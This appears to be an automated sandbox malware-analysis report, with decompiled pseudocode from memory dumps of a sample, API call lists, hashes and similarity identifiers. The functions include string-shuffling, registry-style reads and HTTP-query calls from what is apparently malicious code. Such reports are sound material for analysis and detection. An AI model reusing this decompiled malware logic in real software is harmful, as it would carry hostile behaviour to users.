                                                                                                                                                                                                                                			E00A85CFD(signed int __eax, signed int _a4, signed int _a8) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                                                				intOrPtr _t81;
                                                                                                                                                                                                                                				char _t83;
                                                                                                                                                                                                                                				signed int _t90;
                                                                                                                                                                                                                                				signed int _t97;
                                                                                                                                                                                                                                				signed int _t99;
                                                                                                                                                                                                                                				char _t101;
                                                                                                                                                                                                                                				unsigned int _t102;
                                                                                                                                                                                                                                				intOrPtr _t103;
                                                                                                                                                                                                                                				char* _t107;
                                                                                                                                                                                                                                				signed int _t110;
                                                                                                                                                                                                                                				signed int _t113;
                                                                                                                                                                                                                                				signed int _t118;
                                                                                                                                                                                                                                				signed int _t122;
                                                                                                                                                                                                                                				intOrPtr _t124;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t102 = _a8;
                                                                                                                                                                                                                                				_t118 = 0;
                                                                                                                                                                                                                                				_v20 = __eax;
                                                                                                                                                                                                                                				_t122 = (_t102 >> 2) + 1;
                                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                                				_a8 = 0;
                                                                                                                                                                                                                                				_t81 = E00A85157(_t122 << 2);
                                                                                                                                                                                                                                				_v16 = _t81;
                                                                                                                                                                                                                                				if(_t81 == 0) {
                                                                                                                                                                                                                                					_push(8);
                                                                                                                                                                                                                                					_pop(0);
                                                                                                                                                                                                                                					L37:
                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t107 = _a4;
                                                                                                                                                                                                                                				_a4 = _t102;
                                                                                                                                                                                                                                				_t113 = 0;
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					_t83 =  *_t107;
                                                                                                                                                                                                                                					if(_t83 == 0) {
                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t83 == 0xd || _t83 == 0xa) {
                                                                                                                                                                                                                                						if(_t118 != 0) {
                                                                                                                                                                                                                                							if(_t118 > _v8) {
                                                                                                                                                                                                                                								_v8 = _t118;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_a8 = _a8 + 1;
                                                                                                                                                                                                                                							_t118 = 0;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						 *_t107 = 0;
                                                                                                                                                                                                                                						goto L16;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						if(_t118 != 0) {
                                                                                                                                                                                                                                							L10:
                                                                                                                                                                                                                                							_t118 = _t118 + 1;
                                                                                                                                                                                                                                							L16:
                                                                                                                                                                                                                                							_t107 = _t107 + 1;
                                                                                                                                                                                                                                							_t15 =  &_a4;
                                                                                                                                                                                                                                							 *_t15 = _a4 - 1;
                                                                                                                                                                                                                                							if( *_t15 != 0) {
                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						if(_t113 == _t122) {
                                                                                                                                                                                                                                							L21:
                                                                                                                                                                                                                                							if(_a8 <= 0x20) {
                                                                                                                                                                                                                                								_push(0xb);
                                                                                                                                                                                                                                								L34:
                                                                                                                                                                                                                                								_pop(0);
                                                                                                                                                                                                                                								L35:
                                                                                                                                                                                                                                								E00A853BB(_v16);
                                                                                                                                                                                                                                								goto L37;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t24 = _v8 + 5; // 0xcdd8d2f8
                                                                                                                                                                                                                                							_t103 = E00A85157((_v8 + _t24) * _a8 + 4);
                                                                                                                                                                                                                                							if(_t103 == 0) {
                                                                                                                                                                                                                                								_push(8);
                                                                                                                                                                                                                                								goto L34;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t90 = _a8;
                                                                                                                                                                                                                                							_a4 = _a4 & 0x00000000;
                                                                                                                                                                                                                                							_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                							_t124 = _t103 + _t90 * 4;
                                                                                                                                                                                                                                							if(_t90 <= 0) {
                                                                                                                                                                                                                                								L31:
                                                                                                                                                                                                                                								 *0xa8d2b0 = _t103;
                                                                                                                                                                                                                                								goto L35;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                                                                                                                                                                                                                								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                                                                                                                                                                                                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                                                                                                                                                                                                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                                                                                                                                                                                                                								_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                								if(_a4 <= 0) {
                                                                                                                                                                                                                                									goto L30;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									goto L26;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								while(1) {
                                                                                                                                                                                                                                									L26:
                                                                                                                                                                                                                                									_t99 = _v12;
                                                                                                                                                                                                                                									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                                                                                                                                                                                                                									if(_t99 == 0) {
                                                                                                                                                                                                                                										break;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									_v12 = _v12 + 1;
                                                                                                                                                                                                                                									if(_v12 < _a4) {
                                                                                                                                                                                                                                										continue;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									goto L30;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								_v8 = _v8 - 1;
                                                                                                                                                                                                                                								L30:
                                                                                                                                                                                                                                								_t97 = _a4;
                                                                                                                                                                                                                                								_a4 = _a4 + 1;
                                                                                                                                                                                                                                								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                                                                                                                                                                                                                								__imp__(_t124);
                                                                                                                                                                                                                                								_v8 = _v8 + 1;
                                                                                                                                                                                                                                								_t124 = _t124 + _t97 + 1;
                                                                                                                                                                                                                                							} while (_v8 < _a8);
                                                                                                                                                                                                                                							goto L31;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                                                                                                                                                                                                                						_t101 = _t83;
                                                                                                                                                                                                                                						if(_t83 - 0x61 <= 0x19) {
                                                                                                                                                                                                                                							_t101 = _t101 - 0x20;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						 *_t107 = _t101;
                                                                                                                                                                                                                                						_t113 = _t113 + 1;
                                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_t118 != 0) {
                                                                                                                                                                                                                                					if(_t118 > _v8) {
                                                                                                                                                                                                                                						_v8 = _t118;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_a8 = _a8 + 1;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L21;
                                                                                                                                                                                                                                			}





















                                                                                                                                                                                                                                0x00a85e39
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a85e3b
                                                                                                                                                                                                                                0x00a85e3d
                                                                                                                                                                                                                                0x00a85e40
                                                                                                                                                                                                                                0x00a85e40
                                                                                                                                                                                                                                0x00a85e43
                                                                                                                                                                                                                                0x00a85e47
                                                                                                                                                                                                                                0x00a85e4a
                                                                                                                                                                                                                                0x00a85e50
                                                                                                                                                                                                                                0x00a85e53
                                                                                                                                                                                                                                0x00a85e5a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a85dd6
                                                                                                                                                                                                                                0x00a85d51
                                                                                                                                                                                                                                0x00a85d59
                                                                                                                                                                                                                                0x00a85d5f
                                                                                                                                                                                                                                0x00a85d61
                                                                                                                                                                                                                                0x00a85d61
                                                                                                                                                                                                                                0x00a85d64
                                                                                                                                                                                                                                0x00a85d66
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a85d66
                                                                                                                                                                                                                                0x00a85d40
                                                                                                                                                                                                                                0x00a85d86
                                                                                                                                                                                                                                0x00a85d8b
                                                                                                                                                                                                                                0x00a85d8d
                                                                                                                                                                                                                                0x00a85d8d
                                                                                                                                                                                                                                0x00a85d90
                                                                                                                                                                                                                                0x00a85d90
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(69B25F45,00000020), ref: 00A85DFA
                                                                                                                                                                                                                                • lstrcat.KERNEL32(69B25F45,00000020), ref: 00A85E0F
                                                                                                                                                                                                                                • lstrcmp.KERNEL32(00000000,69B25F45), ref: 00A85E26
                                                                                                                                                                                                                                • lstrlen.KERNEL32(69B25F45), ref: 00A85E4A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3214092121-3916222277
                                                                                                                                                                                                                                • Opcode ID: 49f440bbc8d6f70d9b236335bd77e3fb58b22f578c30b52acdc8d150649a38d3
                                                                                                                                                                                                                                • Instruction ID: eb0b9d82446e025f7d4b87895da0c2e3f8b9387bed9c2754c2146a728b8b10d9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49f440bbc8d6f70d9b236335bd77e3fb58b22f578c30b52acdc8d150649a38d3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E519031E00908EFCF25EFA9C9896ADBBB6FF45354F14805AEC559B211C7709B11CB90
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                                                                                                			E736D70BB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                				signed int _t24;
                                                                                                                                                                                                                                				signed int _t25;
                                                                                                                                                                                                                                				signed int _t29;
                                                                                                                                                                                                                                				signed int _t35;
                                                                                                                                                                                                                                				void* _t37;
                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                				signed int _t42;
                                                                                                                                                                                                                                				signed int _t45;
                                                                                                                                                                                                                                				void* _t47;
                                                                                                                                                                                                                                				void* _t52;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t40 = __edx;
                                                                                                                                                                                                                                				_push(0xc);
                                                                                                                                                                                                                                				_push(0x736e9a30);
                                                                                                                                                                                                                                				E736D7870(__ebx, __edi, __esi);
                                                                                                                                                                                                                                				_t42 =  *(_t47 + 0xc);
                                                                                                                                                                                                                                				if(_t42 != 0) {
                                                                                                                                                                                                                                					L3:
                                                                                                                                                                                                                                					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
                                                                                                                                                                                                                                					__eflags = _t42 - 1;
                                                                                                                                                                                                                                					if(_t42 == 1) {
                                                                                                                                                                                                                                						L6:
                                                                                                                                                                                                                                						_t35 =  *(_t47 + 0x10);
                                                                                                                                                                                                                                						_t45 = E736D71C6( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
                                                                                                                                                                                                                                						 *(_t47 - 0x1c) = _t45;
                                                                                                                                                                                                                                						__eflags = _t45;
                                                                                                                                                                                                                                						if(_t45 == 0) {
                                                                                                                                                                                                                                							L16:
                                                                                                                                                                                                                                							 *(_t47 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                							_t24 = _t45;
                                                                                                                                                                                                                                							L17:
                                                                                                                                                                                                                                							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
                                                                                                                                                                                                                                							return _t24;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t25 = E736D6EB1(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
                                                                                                                                                                                                                                						_t45 = _t25;
                                                                                                                                                                                                                                						 *(_t47 - 0x1c) = _t45;
                                                                                                                                                                                                                                						__eflags = _t45;
                                                                                                                                                                                                                                						if(_t45 == 0) {
                                                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						L8:
                                                                                                                                                                                                                                						_push(_t35);
                                                                                                                                                                                                                                						_t45 = E736D6490( *((intOrPtr*)(_t47 + 8)), _t42);
                                                                                                                                                                                                                                						 *(_t47 - 0x1c) = _t45;
                                                                                                                                                                                                                                						__eflags = _t42 - 1;
                                                                                                                                                                                                                                						if(_t42 == 1) {
                                                                                                                                                                                                                                							__eflags = _t45;
                                                                                                                                                                                                                                							if(_t45 == 0) {
                                                                                                                                                                                                                                								_push(_t35);
                                                                                                                                                                                                                                								_t29 = E736D6490( *((intOrPtr*)(_t47 + 8)), _t26);
                                                                                                                                                                                                                                								__eflags = _t35;
                                                                                                                                                                                                                                								_t14 = _t35 != 0;
                                                                                                                                                                                                                                								__eflags = _t14;
                                                                                                                                                                                                                                								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
                                                                                                                                                                                                                                								E736D700B(_t35, _t40, _t42, _t45, _t14);
                                                                                                                                                                                                                                								_pop(_t37);
                                                                                                                                                                                                                                								E736D71C6( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						__eflags = _t42;
                                                                                                                                                                                                                                						if(_t42 == 0) {
                                                                                                                                                                                                                                							L13:
                                                                                                                                                                                                                                							_t45 = E736D6EB1(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
                                                                                                                                                                                                                                							 *(_t47 - 0x1c) = _t45;
                                                                                                                                                                                                                                							__eflags = _t45;
                                                                                                                                                                                                                                							if(_t45 != 0) {
                                                                                                                                                                                                                                								_t45 = E736D71C6( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
                                                                                                                                                                                                                                								 *(_t47 - 0x1c) = _t45;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							__eflags = _t42 - 3;
                                                                                                                                                                                                                                							if(_t42 != 3) {
                                                                                                                                                                                                                                								goto L16;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L13;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					__eflags = _t42 - 2;
                                                                                                                                                                                                                                					if(_t42 == 2) {
                                                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t35 =  *(_t47 + 0x10);
                                                                                                                                                                                                                                					goto L8;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t52 =  *0x736ef120 - _t42; // 0x1
                                                                                                                                                                                                                                				if(_t52 > 0) {
                                                                                                                                                                                                                                					goto L3;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t24 = 0;
                                                                                                                                                                                                                                				goto L17;
                                                                                                                                                                                                                                			}














APIs
Memory Dump Source
• Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
• Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
• Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
• Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
• Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
• Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
Similarity
• API ID: dllmain_raw$dllmain_crt_dispatch
• String ID:
• API String ID: 3136044242-0
• Opcode ID: f69d82640cb2618b1f393baf875ff620fb233056fe885475575e5e21c5e0934b
• Instruction ID: 5a2ad8b875ffc1c13fee5f14ed6d5ee3781db45e6ff914c0eecdffea6052697a
• Opcode Fuzzy Hash: f69d82640cb2618b1f393baf875ff620fb233056fe885475575e5e21c5e0934b
• Instruction Fuzzy Hash: 1A216D72D21625AFEF228E55CD40F6F7F79EB80A90F094629E816562D4D6308D028BE1
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 18%
                                                                                                                                                                                                                                			E00A89EEE(void* __esi) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				long* _v20;
                                                                                                                                                                                                                                				long _t36;
                                                                                                                                                                                                                                				long* _t47;
                                                                                                                                                                                                                                				intOrPtr* _t63;
                                                                                                                                                                                                                                				intOrPtr* _t64;
                                                                                                                                                                                                                                				char* _t65;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t36 =  *((intOrPtr*)(__esi + 0x28));
                                                                                                                                                                                                                                				_t63 = __esi + 0x2c;
                                                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                                                				 *_t63 = 0;
                                                                                                                                                                                                                                				_v12 = _t36;
                                                                                                                                                                                                                                				if(_t36 != 0) {
                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                					return _v12;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_v8 = 4;
                                                                                                                                                                                                                                				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
                                                                                                                                                                                                                                				if(_t36 == 0) {
                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                					_v12 = GetLastError();
                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_push( &_v16);
                                                                                                                                                                                                                                				_push( &_v8);
                                                                                                                                                                                                                                				_push(_t63);
                                                                                                                                                                                                                                				_t64 = __imp__; // 0x7021fd20
                                                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                                                				_push(0x20000013);
                                                                                                                                                                                                                                				_push( *((intOrPtr*)(__esi + 0x18)));
                                                                                                                                                                                                                                				if( *_t64() == 0) {
                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_v16 = 0;
                                                                                                                                                                                                                                					_v8 = 0;
                                                                                                                                                                                                                                					 *_t64( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
                                                                                                                                                                                                                                					_t47 = E00A85157(_v8 + 2);
                                                                                                                                                                                                                                					_v20 = _t47;
                                                                                                                                                                                                                                					if(_t47 == 0) {
                                                                                                                                                                                                                                						_v12 = 8;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_push( &_v16);
                                                                                                                                                                                                                                						_push( &_v8);
                                                                                                                                                                                                                                						_push(_t47);
                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                						_push(0x16);
                                                                                                                                                                                                                                						_push( *((intOrPtr*)(__esi + 0x18)));
                                                                                                                                                                                                                                						if( *_t64() == 0) {
                                                                                                                                                                                                                                							_v12 = GetLastError();
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_v8 = _v8 >> 1;
                                                                                                                                                                                                                                							 *((short*)(_v20 + _v8 * 2)) = 0;
                                                                                                                                                                                                                                							_t65 = E00A85157(_v8 + 1);
                                                                                                                                                                                                                                							if(_t65 == 0) {
                                                                                                                                                                                                                                								_v12 = 8;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								wcstombs(_t65, _v20, _v8 + 1);
                                                                                                                                                                                                                                								 *(__esi + 0xc) = _t65;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						E00A853BB(_v20);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A89FE2
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • wcstombs.NTDLL ref: 00A89FB0
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A89FC6
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$AllocateHeapwcstombs
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 2631933831-1701360479
                                                                                                                                                                                                                                • Opcode ID: bf31cb36acde943157e70a562f3013fdfb71fe2743dc917c9fd8229c15fdbed3
                                                                                                                                                                                                                                • Instruction ID: 91b6af6bbb7f76f65fbb197826f58e09dff028f604f862ed7ea5ab22ba04126f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf31cb36acde943157e70a562f3013fdfb71fe2743dc917c9fd8229c15fdbed3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8631F5B5900209EFDB14EFA5CD84EAFB7B8EB48344B244969E612E7250D6309E459B60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A82932(void* __edx) {
                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                				int _v12;
                                                                                                                                                                                                                                				WCHAR* _v16;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                				intOrPtr _t24;
                                                                                                                                                                                                                                				void* _t26;
                                                                                                                                                                                                                                				intOrPtr _t32;
                                                                                                                                                                                                                                				intOrPtr _t35;
                                                                                                                                                                                                                                				intOrPtr _t38;
                                                                                                                                                                                                                                				intOrPtr _t42;
                                                                                                                                                                                                                                				void* _t45;
                                                                                                                                                                                                                                				void* _t50;
                                                                                                                                                                                                                                				void* _t52;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t50 = __edx;
                                                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                                                				_t23 = E00A89B32(0,  &_v8); // executed
                                                                                                                                                                                                                                				if(_t23 != 0) {
                                                                                                                                                                                                                                					_v8 = 0;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t24 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                				_t4 = _t24 + 0xa8edc8; // 0x1ae9370
                                                                                                                                                                                                                                				_t5 = _t24 + 0xa8ed70; // 0x4f0053
                                                                                                                                                                                                                                				_t26 = E00A8779A( &_v16, _v8, _t5, _t4); // executed
                                                                                                                                                                                                                                				_t45 = _t26;
                                                                                                                                                                                                                                				if(_t45 == 0) {
                                                                                                                                                                                                                                					StrToIntExW(_v16, 0,  &_v12);
                                                                                                                                                                                                                                					_t45 = 8;
                                                                                                                                                                                                                                					if(_v12 < _t45) {
                                                                                                                                                                                                                                						_t45 = 1;
                                                                                                                                                                                                                                						__eflags = 1;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t32 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                						_t11 = _t32 + 0xa8edbc; // 0x1ae9364
                                                                                                                                                                                                                                						_t48 = _t11;
                                                                                                                                                                                                                                						_t12 = _t32 + 0xa8ed70; // 0x4f0053
                                                                                                                                                                                                                                						_t52 = E00A81FCE(_t11, _t12, _t11);
                                                                                                                                                                                                                                						_t59 = _t52;
                                                                                                                                                                                                                                						if(_t52 != 0) {
                                                                                                                                                                                                                                							_t35 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                							_t13 = _t35 + 0xa8ee06; // 0x30314549
                                                                                                                                                                                                                                							if(E00A82AE3(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                                                                                                                                                                                                                                								_t61 =  *0xa8d294 - 6;
                                                                                                                                                                                                                                								if( *0xa8d294 <= 6) {
                                                                                                                                                                                                                                									_t42 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                									_t15 = _t42 + 0xa8ec12; // 0x52384549
                                                                                                                                                                                                                                									E00A82AE3(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t38 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                							_t17 = _t38 + 0xa8ee00; // 0x1ae93a8
                                                                                                                                                                                                                                							_t18 = _t38 + 0xa8edd8; // 0x680043
                                                                                                                                                                                                                                							_t45 = E00A89BED(_v8, 0x80000001, _t52, _t18, _t17);
                                                                                                                                                                                                                                							HeapFree( *0xa8d270, 0, _t52);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					HeapFree( *0xa8d270, 0, _v16);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t54 = _v8;
                                                                                                                                                                                                                                				if(_v8 != 0) {
                                                                                                                                                                                                                                					E00A8704F(_t54);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t45;
                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,01AE9370,00000000,?,747DF710,00000000,747DF730), ref: 00A82981
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,01AE93A8,?,00000000,30314549,00000014,004F0053,01AE9364), ref: 00A82A1E
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00A8A080), ref: 00A82A30
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3298025750-1536154274
                                                                                                                                                                                                                                • Opcode ID: 83cf5bb518061a494a39aeecb67f1d1498d085f3cd01cf002803bf12f407a0ea
                                                                                                                                                                                                                                • Instruction ID: 29ff366adb52866789a54a77883e86ac0e2d08bcb2b104fe7dd1064ecf8bc19b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83cf5bb518061a494a39aeecb67f1d1498d085f3cd01cf002803bf12f407a0ea
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39316D75A00118FFEB21EBE4DE89EBA7BBCFF44750F1400A6B540971A1E670AE06DB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(80000002), ref: 00A84AC7
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00A848F5), ref: 00A84B0B
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A84B1F
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A84B2D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
